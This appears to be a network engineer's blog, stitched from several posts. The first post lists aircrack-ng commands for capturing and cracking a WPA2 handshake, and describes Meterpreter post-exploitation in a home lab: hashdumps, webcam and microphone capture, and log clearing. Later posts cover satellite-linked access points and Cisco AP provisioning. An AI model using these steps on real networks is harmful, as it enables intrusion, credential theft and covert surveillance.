So my wife wasn’t well for most of the weekend and the kids are busy doing their stuff. So I got some time to play around 🙂 on my home lab. – so here’s the thing:
It took me less than 5 mins to obtain a WPA2 handshake and less than 5 seconds to brute force the *.cap file that contained the password; post-handshake and obviously it’s only as good as your word list.
Key commands are:
airodump-ng [monitor interface]
airodump-ng -c [channel] –bssid [bssid] -w /root/Desktop/ [monitor interface]
aireplay-ng –0 2 –a [router bssid] –c [client bssid] [monitor interface]
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap
Further to that, and in about as much time as it took me to read up on Meterpreter, with recognition to Offensive Security. I was able to access a couple of Windows PC’s on my test network. Not only was I able to access the target machines, I obtained a hashdump, took a screenshot, took remote control, opened a shell/cmd, downloaded a file and probably the most impressive and most worrying was the ability to run the remote webcam, taking a snap and a continuous stream, along with audio recording from the microphone on those target machines. Oh…. and I cleared the logs as I left the scene – all within a couple of hours.
So keep those systems secure and up to date peeps!
A quick install of Satellite Communications, using the Telsta iterra network and SSN (Silver Springs Networks) Access Points in remote WA. One of a few AP’s that have to be Sat connected due to there being no 3/4G. Nevertheless it worked as expected. These SSN AP’s operate on both 900 MHz and 2.4 GHz which increases the capacity and reliability of the meshed network, ultimately providing access and supporting Smart Meters, out bush.
Working in 40 degree heat with shade provided, courtesy of Horizon Power 👌🏼
Nowadays Autonomous AP deployments are rarely used, it is very hard to find quality documentation(apart from Cisco configuration guides & few support forum docs) how to configure these…
Source: Autonomous AP – Wireless Bridges
OK, I’ve just been told by Cisco TAC that the AP’s we purchased don’t do 2.4Ghz bridge – really ????
Doco says otherwise, keen to close the call i’d say. FFS
Configuration Guide to Aironet AP’s; and
Lightweight AP (LAP) Registration to a Wireless LAN Controller (WLC)
Getting Started Guide Cisco Aironet 1530 Outdoor Access Points
Cisco Aironet Universal AP Priming and Cisco AirProvision User Guide
Scope, Objectives and Expectations
A good guide to some of the basics with wireless bridges.
I was recently asked to design a point-2-point wireless solution which fast became a point-to-multipoint. Regardless of the design the Access Points used were AIR-AP1532E-UXK9 with a vision of utilising the 5Ghz back-haul and a 14dBi directional antenna to cover line-of-sight.
These UX Access Points address the worldwide regulatory compliance by dynamically setting their regulatory domain/country based on their GPS location – sounds simple right and it is important to point out that you can’t use the 5Ghz until the AP has been provisioned, as the 5Ghz stays in Scanner mode.
However, the provisioning of these Access Points is carried out by either the Smartphone method or via WLC. I needed to use my iPhone but the Apple iPhone app was broken (confirmed by Cisco: Bug ID CSCuw28658), nor did the Android App work, but thank you Windows Smart phone :), you saved the day (never thought I would say that).
Followed the User Guide to set the domain. remembering to use the WPA v2 and the default userid/password for AP provisioning and not the SSID Password
The un-provisioned AP looks like this:
The provisioned AP (to Australia/NZ), looks like this:
Got there in the end but Dear Cisco, I’m unimpressed with the process for provisioning these AP’s, it definitely needs improvement.
Useful documentation on OEAP